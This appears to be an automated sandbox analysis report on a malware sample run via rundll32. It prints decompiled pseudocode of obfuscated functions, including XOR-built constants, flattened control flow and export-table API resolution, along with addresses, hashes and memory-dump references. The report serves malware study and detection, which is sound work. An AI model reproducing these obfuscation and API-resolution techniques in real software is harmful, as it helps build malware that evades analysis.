				signed int _t139;
				char* _t140;
				intOrPtr* _t156;

				_v60 = _v60 & 0x00000000;
				_v72 = 0xe3568;
				_v68 = 0x2883ad;
				_v64 = 0x1a7bf3;
				_v44 = 0xf414;
				_v44 = _v44 ^ 0x8770b590;
				_v44 = _v44 ^ 0x87700964;
				_v36 = 0xb854;
				_v36 = _v36 << 7;
				_v36 = _v36 ^ 0x005c6a34;
				_v12 = 0x1e6f;
				_v12 = _v12 ^ 0xf4069a1b;
				_v12 = _v12 << 0xd;
				_t156 = __ecx;
				_t137 = 0x57;
				_v12 = _v12 / _t137;
				_v12 = _v12 ^ 0x0265e4d2;
				_v24 = 0x8571;
				_v24 = _v24 + 0xffff3aa5;
				_v24 = _v24 | 0x45c7521f;
				_v24 = _v24 ^ 0xffffa68c;
				_v56 = 0xe2bc;
				_v56 = _v56 + 0xac59;
				_v56 = _v56 ^ 0x0001c024;
				_v28 = 0xc379;
				_v28 = _v28 >> 5;
				_v28 = _v28 >> 5;
				_v28 = _v28 ^ 0x00005cee;
				_v32 = 0x29f6;
				_t138 = 0x70;
				_v32 = _v32 / _t138;
				_t139 = 0x16;
				_t140 =  &_v332;
				_v32 = _v32 / _t139;
				_v32 = _v32 ^ 0x0000381e;
				_v20 = 0x6921;
				_v20 = _v20 ^ 0xc84b8620;
				_v20 = _v20 ^ 0xee2afc44;
				_v20 = _v20 * 0x68;
				_v20 = _v20 ^ 0x976f8b66;
				_v52 = 0x2d40;
				_v52 = _v52 + 0xe0f;
				_v52 = _v52 ^ 0x00002a29;
				_v48 = 0x9fae;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x00003426;
				_v8 = 0x1268;
				_v8 = _v8 + 0xffffad14;
				_v8 = _v8 + 0xfbd;
				_v8 = _v8 | 0x03aa70af;
				_v8 = _v8 ^ 0xffff927e;
				_v40 = 0x43b2;
				_v40 = _v40 >> 5;
				_v40 = _v40 ^ 0x00005849;
				_v16 = 0x2e64;
				_v16 = _v16 | 0x5ee4e259;
				_v16 = _v16 * 0x35;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 ^ 0x0000e727;
				while(1) {
					_t130 =  *_t156;
					if(_t130 == 0) {
						break;
					}
					if(_t130 == 0x2e) {
						 *_t140 = 0;
					} else {
						 *_t140 = _t130;
						_t140 = _t140 + 1;
						_t156 = _t156 + 1;
						continue;
					}
					L6:
					_t131 = E0044A03C( &_v332, _v44, _v36, _v12, _v24);
					_t157 = _t131;
					if(_t131 != 0) {
						L8:
						_push(E00441D2B(_v32, _t156 + 1, _v20, _v52) ^ 0x0c5c2292);
						_push(_v16);
						_push(_v40);
						_push(_v8);
						return E0044C4DD(_v48, _t157);
					}
					_t135 = E0043F04C( &_v332, _v56, _v28);
					_t157 = _t135;
					if(_t135 != 0) {
						goto L8;
					}
					return _t135;
				}
				goto L6;
			}

0x00432211
0x00432217
0x0043221e
0x00432225
0x0043222c
0x00432233
0x0043223a
0x00432241
0x00432248
0x0043224c
0x00432253
0x0043225a
0x00432261
0x0043226c
0x0043226e
0x00432273
0x00432278
0x0043227f
0x00432286
0x0043228d
0x00432294
0x0043229b
0x004322a2
0x004322a9
0x004322b0
0x004322b7
0x004322bb
0x004322bf
0x004322c6
0x004322d0
0x004322d5
0x004322dd
0x004322e0
0x004322e6
0x004322e9
0x004322f0
0x004322f7
0x004322fe
0x00432309
0x0043230c
0x00432313
0x0043231a
0x00432321
0x00432328
0x0043232f
0x00432333
0x0043233a
0x00432341
0x00432348
0x0043234f
0x00432356
0x0043235d
0x00432364
0x00432368
0x0043236f
0x00432376
0x00432381
0x00432384
0x00432388
0x00432399
0x00432399
0x0043239d
0x00000000
0x00000000
0x00432393
0x004323a1
0x00432395
0x00432395
0x00432397
0x00432398
0x00000000
0x00432398
0x004323a4
0x004323b6
0x004323bb
0x004323c2
0x004323dc
0x004323f4
0x004323f5
0x004323f8
0x004323fb
0x00000000
0x00432406
0x004323d0
0x004323d5
0x004323da
0x00000000
0x00000000
0x0043240e
0x0043240e
0x00000000

Strings

Y^, xrefs: 00432376
4j\, xrefs: 0043224C

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 4j\$Y^
API String ID: 0-2203625362
Opcode ID: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
Instruction ID: 4b80fe3f8eb08af6e75a94a7940a3e21717d07001dab52ee32b0994e3e938838
Opcode Fuzzy Hash: 2ab281e20babec8f914e23fe26d2a0305b4f6cc775f439d274d1a935f3a080a8
Instruction Fuzzy Hash: 0A512671C0121AEBEF19CFE5D94A5EEBBB1FF04304F208199D511B62A0D7B90A59CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00443F4F, Relevance: 2.6, Strings: 2, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E00443F4F(signed int __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _t63;
				signed int _t65;
				signed int _t69;
				signed int _t70;
				void* _t79;
				signed int _t80;
				void* _t81;
				signed int _t84;
				intOrPtr* _t87;
				signed int* _t88;

				_t70 = __ecx;
				_t88 =  &_v564;
				_v524 = _v524 & 0x00000000;
				_v528 = 0x208792;
				_v540 = 0xd4e9;
				_v540 = _v540 + 0xffffc88b;
				_v540 = _v540 ^ 0x0000d9d0;
				_v532 = 0x336b;
				_v532 = _v532 | 0xfe809e09;
				_v532 = _v532 ^ 0xfe80eed9;
				_v564 = 0x8dd7;
				_v564 = _v564 << 9;
				_v564 = _v564 ^ 0x316f6ec5;
				_v564 = _v564 + 0xffffc640;
				_v564 = _v564 ^ 0x307484c3;
				_v536 = 0x3e91;
				_v536 = _v536 + 0xa90d;
				_v536 = _v536 ^ 0x0000a803;
				_v560 = 0xf01b;
				_v560 = _v560 << 0x10;
				_v560 = _v560 * 0x4f;
				_t87 = __edx;
				_v560 = _v560 ^ 0x18550a74;
				_t69 = __ecx;
				_v552 = 0x212a;
				_t81 = 0x2a877a8b;
				_v552 = _v552 * 0x19;
				_v552 = _v552 ^ 0x00030550;
				_v544 = 0xd358;
				_v544 = _v544 | 0x5b8e85e0;
				_v544 = _v544 ^ 0x5b8ed83a;
				_v556 = 0x81e1;
				_v556 = _v556 ^ 0x5f3d7dd3;
				_v556 = _v556 ^ 0x5f3de0ae;
				_t80 = _v556;
				_v548 = 0x11a6;
				_v548 = _v548 << 1;
				_v548 = _v548 ^ 0x000056ff;
				while(_t81 != 0xa9a8994) {
					if(_t81 == 0x1592b590) {
						_push( &_v520);
						_t63 = E0044B165(_t69, _t87);
						asm("sbb esi, esi");
						_t70 = 0x431020;
						_t84 =  ~_t63 & 0xf51449f8;
						L9:
						_t81 = _t84 + 0x29fbdc3d;
						continue;
					}
					if(_t81 == 0x1f102635) {
						_push(0);
						_push(0);
						_push(_v544);
						_push(_v552);
						_push(_v560);
						_push(_v536);
						_push( &_v520);
						_push(0);
						_t65 = E00436417(_v564, __eflags);
						_t88 =  &(_t88[8]);
						asm("sbb esi, esi");
						_t84 =  ~_t65 & 0xe09ead57;
						__eflags = _t84;
						goto L9;
					}
					if(_t81 == 0x29fbdc3d) {
						return E0043DE81(_v556, _t80, _v548);
					}
					if(_t81 != 0x2a877a8b) {
						L12:
						__eflags = _t81 - 0x1e6f5ee2;
						if(__eflags != 0) {
							continue;
						} else {
							return _t65;
						}
						L15:
						return _t65;
					}
					_t79 = 0x50;
					_t65 = E004354FB(_t79);
					_t80 = _t65;
					_t70 = _t70;
					if(_t80 != 0) {
						_t81 = 0x1592b590;
						continue;
					}
					goto L15;
				}
				 *((intOrPtr*)(_t80 + 0x44)) = _t69;
				_t81 = 0x1e6f5ee2;
				 *_t80 =  *0x451084;
				 *0x451084 = _t80;
				goto L12;
			}

0x00443f4f
0x00443f4f
0x00443f55
0x00443f5a
0x00443f62
0x00443f6a
0x00443f72
0x00443f7a
0x00443f82
0x00443f8a
0x00443f92
0x00443f99
0x00443f9d
0x00443fa4
0x00443fab
0x00443fb2
0x00443fba
0x00443fc2
0x00443fca
0x00443fd2
0x00443fe0
0x00443fe4
0x00443fe6
0x00443fee
0x00443ff0
0x00443ff8
0x00444002
0x00444006
0x0044400e
0x00444016
0x0044401e
0x00444026
0x0044402e
0x00444036
0x0044403e
0x00444042
0x0044404a
0x0044404e
0x00444056
0x00444068
0x004440f5
0x004440fd
0x00444107
0x00444109
0x0044410a
0x004440e4
0x004440e4
0x00000000
0x004440e4
0x00444074
0x004440b1
0x004440b3
0x004440b5
0x004440bd
0x004440c1
0x004440c5
0x004440cd
0x004440ce
0x004440d0
0x004440d5
0x004440dc
0x004440de
0x004440de
0x00000000
0x004440de
0x0044407c
0x00000000
0x00444144
0x00444088
0x00444127
0x00444127
0x0044412d
0x00000000
0x00000000
0x00000000
0x00000000
0x0044414f
0x0044414f
0x0044414f
0x00444099
0x0044409a
0x0044409f
0x004440a1
0x004440a4
0x004440aa
0x00000000
0x004440aa
0x00000000
0x004440a4
0x00444112
0x00444115
0x0044411f
0x00444121
0x00000000

Strings

*!, xrefs: 00443FF0
k3, xrefs: 00443F7A

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *!$k3
API String ID: 0-1396716965
Opcode ID: 8d6e231b5f98135e5a94b1ad85a81b8f994cdb91ef9355c048b962005407b5c4
Instruction ID: f12b2bf6ccb93f866dc906fc3a45e7d502b826a1e38caf52f809a180d109a172
Opcode Fuzzy Hash: 8d6e231b5f98135e5a94b1ad85a81b8f994cdb91ef9355c048b962005407b5c4
Instruction Fuzzy Hash: 374190724083019BE314DF15D84561BFBE0FBD8754F114A1EF5D59B2A0D3798A49CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 001834C3, Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

*!, xrefs: 00183564
k3, xrefs: 001834EE

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *!$k3
API String ID: 0-1396716965
Opcode ID: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
Instruction ID: b322e2250ae0df495dc9c292d5ac3d35a9f77eafbc8f2f3bb2b4cfeb069d258d
Opcode Fuzzy Hash: eae0f129622ca1be1331d6256decdb13aa3d9fafa60389adb5a47b4304c4b6e5
Instruction Fuzzy Hash: 2441CD72408301DBD314DF19D84555BFBE0BB88758F258A1DF5E9AB2A0D3B58B4A8F82

Uniqueness

Uniqueness Score: -1.00%

Function 00433938, Relevance: 2.6, Strings: 2, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00433938(intOrPtr __ecx, void* __edx) {
				intOrPtr _t84;
				void* _t89;
				void* _t95;
				signed int _t97;
				signed int _t98;
				signed int _t112;
				intOrPtr _t113;
				intOrPtr _t116;
				void* _t117;
				void* _t118;

				_t116 =  *((intOrPtr*)(_t117 + 0x38));
				_push( *((intOrPtr*)(_t117 + 0x44)));
				 *((intOrPtr*)(_t117 + 0x24)) = __ecx;
				_push(_t116);
				_push(__edx);
				_push(__ecx);
				E00442550(__ecx);
				 *((intOrPtr*)(_t117 + 0x44)) = 0x4b2d38;
				_t118 = _t117 + 0x10;
				_t113 = 0;
				 *((intOrPtr*)(_t118 + 0x38)) = 0;
				 *(_t118 + 0x14) = 0x6eb8;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0x7c344bdb;
				_t97 = 0x3d;
				 *(_t118 + 0x18) =  *(_t118 + 0x14) / _t97;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x02096a70;
				 *(_t118 + 0x14) = 0xfd73;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) ^ 0xa1be20cb;
				 *(_t118 + 0x14) =  *(_t118 + 0x14) >> 0xf;
				_t98 = 0x57;
				 *(_t118 + 0x10) =  *(_t118 + 0x14) / _t98;
				 *(_t118 + 0x10) =  *(_t118 + 0x10) ^ 0x00004917;
				 *(_t118 + 0x40) = 0x3423;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xab2a12e8;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) | 0xd17ac73e;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) + 0xffff5f1a;
				 *(_t118 + 0x40) =  *(_t118 + 0x40) ^ 0xfb7a79e5;
				 *(_t118 + 0x1c) = 0x40db;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) >> 0xa;
				 *(_t118 + 0x1c) =  *(_t118 + 0x1c) ^ 0x00005dd2;
				 *(_t118 + 0x18) = 0xa0e8;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d9e5e;
				 *(_t118 + 0x18) =  *(_t118 + 0x18) ^ 0x870d3eb6;
				_t84 =  *((intOrPtr*)(_t116 + 0x3c));
				_t112 =  *(_t118 + 0x18);
				 *((intOrPtr*)(_t118 + 0x30)) = _t84;
				_t95 =  *((intOrPtr*)(_t84 + _t116 + 0x78)) + _t116;
				 *((intOrPtr*)(_t118 + 0x2c)) =  *((intOrPtr*)(_t95 + 0x1c)) + _t116;
				_t100 =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x24)) =  *((intOrPtr*)(_t95 + 0x20)) + _t116;
				 *((intOrPtr*)(_t118 + 0x28)) =  *((intOrPtr*)(_t95 + 0x24)) + _t116;
				while(_t112 <  *((intOrPtr*)(_t95 + 0x18))) {
					_t89 = E00442497( *((intOrPtr*)(_t100 + _t112 * 4)) + _t116,  *((intOrPtr*)(_t118 + 0x24)),  *(_t118 + 0x1c),  *((intOrPtr*)(_t118 + 0x28)),  *((intOrPtr*)(_t118 + 0x44)),  *(_t118 + 0x1c));
					_t118 = _t118 + 0x10;
					if(_t89 == 0) {
						_t113 =  *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x2c)) + ( *( *((intOrPtr*)(_t118 + 0x28)) + _t112 * 2) & 0x0000ffff) * 4)) + _t116;
						if(_t113 >= _t95) {
							_t113 =  <  ? 0 : _t113;
						}
						L7:
						return _t113;
					}
					_t100 =  *((intOrPtr*)(_t118 + 0x24));
					_t112 = _t112 + 1;
				}
				goto L7;
			}

0x0043393d
0x00433945
0x00433949
0x0043394d
0x0043394e
0x0043394f
0x00433950
0x00433955
0x0043395d
0x00433960
0x00433964
0x00433968
0x00433970
0x0043397e
0x00433983
0x00433989
0x00433991
0x00433999
0x004339a1
0x004339aa
0x004339ad
0x004339b1
0x004339b9
0x004339c1
0x004339c9
0x004339d1
0x004339d9
0x004339e1
0x004339e9
0x004339ee
0x004339f6
0x004339fe
0x00433a06
0x00433a0e
0x00433a11
0x00433a15
0x00433a1d
0x00433a27
0x00433a2b
0x00433a32
0x00433a36
0x00433a66
0x00433a55
0x00433a5a
0x00433a5f
0x00433a7c
0x00433a80
0x00433a90
0x00433a90
0x00433a94
0x00433a9c
0x00433a9c
0x00433a61
0x00433a65
0x00433a65
0x00000000

Strings

8-K, xrefs: 00433955
#4, xrefs: 004339B9

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #4$8-K
API String ID: 0-2690090699
Opcode ID: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
Instruction ID: 1aaf6ffef1a61855753e21eaf901c6c1d2b29718d143f61a73ffef49ba1b9772
Opcode Fuzzy Hash: fea5701da5a9700051d942127ae9cea1d7486b1558de5fec2ebc5bc002ed8a6a
Instruction Fuzzy Hash: BE4188716083019FD318CF29C98141BBBF1EF88748F00092EF895A7261D775EA19CF8A

Uniqueness

Uniqueness Score: -1.00%

Function 00172EAC, Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

8-K, xrefs: 00172EC9
#4, xrefs: 00172F2D

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #4$8-K
API String ID: 0-2690090699
Opcode ID: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
Instruction ID: 73d822058fcee53cf7c21b954b559c545af25e730b4ed007bea4ff3d3eb0b892
Opcode Fuzzy Hash: 9d935698cac112b8a835fd4d56c32ee63574270cee71746eaa1e1968735281d7
Instruction Fuzzy Hash: 524165B16083019FD718CF29C98581BBBF1FB88748F00492EF99597261C771EA59CF96

Uniqueness

Uniqueness Score: -1.00%

Function 0044C192, Relevance: 2.6, Strings: 2, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0044C192(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				char _v116;
				void* _t95;
				signed int _t104;
				void* _t107;
				intOrPtr _t116;

				_v8 = 0x9f81;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x31dab1ca;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x03147ff0;
				_v20 = 0xa808;
				_v20 = _v20 | 0xee8c9d34;
				_v20 = _v20 >> 4;
				_v20 = _v20 ^ 0x0ee8e1a4;
				_v40 = 0x98c1;
				_v40 = _v40 + 0xffff69a9;
				_v40 = _v40 ^ 0x000017b7;
				_v36 = 0x182a;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005093;
				_v24 = 0xa138;
				_v24 = _v24 + 0x4d23;
				_t104 = 0x57;
				_t116 = _a4;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00001377;
				_v12 = 0x3e71;
				_v12 = _v12 << 3;
				_v12 = _v12 << 4;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x00005605;
				_v16 = 0x4dd8;
				_v16 = _v16 | 0x590e6d8f;
				_v16 = _v16 * 0x47;
				_v16 = _v16 * 0x3d;
				_v16 = _v16 ^ 0xa71caf0d;
				_v32 = 0x3ec3;
				_v32 = _v32 << 3;
				_v32 = _v32 | 0x7ba18124;
				_v32 = _v32 ^ 0x7ba1e0dd;
				_v28 = 0xb72f;
				_v28 = _v28 + 0x7494;
				_v28 = _v28 ^ 0xe721bd43;
				_v28 = _v28 ^ 0xe720bd0c;
				_t95 =  *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 1, 0);
				_t119 = _t95;
				if(_t95 != 0) {
					E00444C37( &_v116, _v8, _v20);
					_pop(_t107);
					_v52 =  &_v116;
					_v48 = E0044A966(_v40, _v36, _t119, _t107, _v24, _v12);
					 *((intOrPtr*)(_t116 + 0x18))( *((intOrPtr*)(_t116 + 8)), 0xa,  &_v52,  &_v44);
					E00440D6D(_v16, _v32, _v28, _v48);
				}
				return 0;
			}

0x0044c198
0x0044c1a1
0x0044c1a5
0x0044c1ac
0x0044c1b0
0x0044c1b7
0x0044c1be
0x0044c1c5
0x0044c1c9
0x0044c1d0
0x0044c1d7
0x0044c1de
0x0044c1e5
0x0044c1ec
0x0044c1f0
0x0044c1f7
0x0044c1fe
0x0044c20b
0x0044c20e
0x0044c211
0x0044c214
0x0044c21b
0x0044c222
0x0044c226
0x0044c22a
0x0044c22e
0x0044c235
0x0044c23c
0x0044c24b
0x0044c252
0x0044c255
0x0044c25c
0x0044c263
0x0044c267
0x0044c26e
0x0044c275
0x0044c27c
0x0044c283
0x0044c28a
0x0044c294
0x0044c297
0x0044c299
0x0044c2a4
0x0044c2aa
0x0044c2ae
0x0044c2ca
0x0044c2d6
0x0044c2e5
0x0044c2eb
0x0044c2f2

Strings

#M, xrefs: 0044C1FE
q>, xrefs: 0044C21B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #M$q>
API String ID: 0-3778844937
Opcode ID: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
Instruction ID: 15e7cf89af5171be9cda748214152732cac88855a01ea2303e81f13adb76e6a0
Opcode Fuzzy Hash: e014fd25fd94ebfb7f6ea6ba12767a06829e02c2ca803fd4af27c54cc90a2fb3
Instruction Fuzzy Hash: 2941E472C0020DABEF19DFA1C94A9EEFBB4FF04304F208559D522B6290D7B95A05CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0018B706, Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

#M, xrefs: 0018B772
q>, xrefs: 0018B78F

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: #M$q>
API String ID: 0-3778844937
Opcode ID: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
Instruction ID: caadb4f333dd3ed132e04c928962687f5e0fe3d653f17629218ff9aee19e2a7e
Opcode Fuzzy Hash: a1e8801eff8f8b6530ebe58d1d0d3bbce165d8e7055afb7e7f6b6bc2d86411b5
Instruction Fuzzy Hash: C141F072C0020DABEF19DFA1C94A8EEBBB4FF14304F208559D522B62A0D7B95B05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00440672, Relevance: 2.6, Strings: 2, Instructions: 73
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00440672(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				void* _t60;
				signed int _t63;
				void* _t65;
				void* _t71;
				void* _t72;
				unsigned int* _t74;

				_t65 = __ecx;
				_t74 =  &_v24;
				_v16 = 0xc222;
				_v16 = _v16 | 0x2c4811a6;
				_v16 = _v16 + 0xffff2ea9;
				_v16 = _v16 ^ 0x2c485227;
				_v4 = 0x52bd;
				_v4 = _v4 ^ 0x701b7809;
				_v4 = _v4 ^ 0x701b4439;
				_v8 = 0x440a;
				_t63 = 0x3c;
				_t71 = 0;
				_v8 = _v8 / _t63;
				_t72 = 0x1db47164;
				_v8 = _v8 ^ 0x0000441a;
				_v24 = 0x7d6d;
				_v24 = _v24 + 0xffffc5c3;
				_v24 = _v24 >> 2;
				_v24 = _v24 + 0xffffb313;
				_v24 = _v24 ^ 0xffffe3d6;
				_v12 = 0x8699;
				_v12 = _v12 + 0xfffff638;
				_v12 = _v12 ^ 0x3f0bf62e;
				_v12 = _v12 ^ 0x3f0bf546;
				_v20 = 0x2aa4;
				_v20 = _v20 + 0xffff16b8;
				_v20 = _v20 >> 8;
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x5affa7fd;
				do {
					while(_t72 != 0xffebff) {
						if(_t72 == 0x1db47164) {
							_t72 = 0xffebff;
							continue;
						} else {
							if(_t72 != 0x28d16d2c) {
								goto L8;
							} else {
								_t71 = _t71 + E00446B54(_t65 + 4, _v12, _v20);
							}
						}
						L5:
						return _t71;
					}
					_t60 = E00442493();
					_t74 = _t74 - 0xc + 0xc;
					_t72 = 0x28d16d2c;
					_t71 = _t71 + _t60;
					L8:
				} while (_t72 != 0x306bf85d);
				goto L5;
			}

0x00440672
0x00440672
0x00440675
0x0044067f
0x00440687
0x0044068f
0x00440697
0x0044069f
0x004406a7
0x004406af
0x004406c1
0x004406c9
0x004406cb
0x004406cf
0x004406d1
0x004406de
0x004406eb
0x004406f3
0x004406f8
0x00440700
0x00440708
0x00440710
0x00440718
0x00440720
0x00440728
0x00440730
0x00440738
0x00440742
0x00440746
0x0044074e
0x0044074e
0x00440754
0x00440779
0x00000000
0x00440756
0x00440758
0x00000000
0x0044075a
0x0044076d
0x0044076d
0x00440758
0x0044076f
0x00440778
0x00440778
0x00440790
0x00440795
0x00440798
0x0044079a
0x0044079c
0x0044079c
0x00000000

Strings

'RH,, xrefs: 0044068F
m}, xrefs: 004406DE

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'RH,$m}
API String ID: 0-2515829961
Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction ID: d7d74c57ca1107fe398ed16924d2372e7a1a8f0459920e70e6dfcede968b8ea0
Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction Fuzzy Hash: EF316F725093028BD324DF29E98540BFBE0BBD4714F118A1DE5D5A3220D3749A198F97

Uniqueness

Uniqueness Score: -1.00%

Function 001768EC, Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

|2, xrefs: 00176943
z", xrefs: 00176983

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: z"$|2
API String ID: 0-191029632
Opcode ID: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
Instruction ID: a3a2ffbd739473391593e1b2c73e479939084fc331bab8f5ca8e63fd19456790
Opcode Fuzzy Hash: fe226a8a923b63f17ed5cb043c32f7a565b0df65fb12a0d1d977b04ae3c82b13
Instruction Fuzzy Hash: E43102B5D1021DEFEF48DFA4C94A4EEBBB5FB44304F108059EA11B6260D3B84A06DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0017FBE6, Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

'RH,, xrefs: 0017FC03
m}, xrefs: 0017FC52

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 'RH,$m}
API String ID: 0-2515829961
Opcode ID: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction ID: 5e7ac2e0d0dd6bba0eacc048164cbac77cb96fc5c015339d3d7aeed6e702ab07
Opcode Fuzzy Hash: 9c116aca3ec0e0372c49209bd39f855765885274787401dbb57e67fa70514153
Instruction Fuzzy Hash: D7316C725093428BD324DE68E88580BFBE0BBD4714F158A2DE9D5A7260D3758A0A8B93

Uniqueness

Uniqueness Score: -1.00%

Function 001834BF, Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

*!, xrefs: 00183564
k3, xrefs: 001834EE

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: *!$k3
API String ID: 0-1396716965
Opcode ID: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
Instruction ID: 1fdc02e5c0e0e58ac9c13731016574d3e933e7981a01867862a915b6688283bf
Opcode Fuzzy Hash: 424d58d99afbab0889c77edd62e26163cf9f9c37bbf812761af42d48eba7e0d8
Instruction Fuzzy Hash: ED3137724083019FD314DF29D48941BFBE0BB94758F158A0DE1E99B2A1D3B88B4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 0017F797, Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

+,", xrefs: 0017F7AA
oZ, xrefs: 0017F7E4

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

